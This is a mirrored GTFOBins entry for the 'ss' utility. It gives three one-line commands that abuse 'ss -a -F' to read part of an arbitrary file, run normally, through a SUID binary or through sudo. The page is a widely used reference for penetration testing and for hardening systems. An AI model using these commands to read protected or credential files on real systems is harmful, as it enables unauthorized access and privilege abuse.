1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/ss.md
2020-12-20 20:41:49 +01:00

379 B

description functions
The file content is actually parsed so only a part of the first line is returned as a part of an error message.
file-read suid sudo
code
LFILE=file_to_read ss -a -F $LFILE
code
LFILE=file_to_read ./ss -a -F $LFILE
code
LFILE=file_to_read sudo ss -a -F $LFILE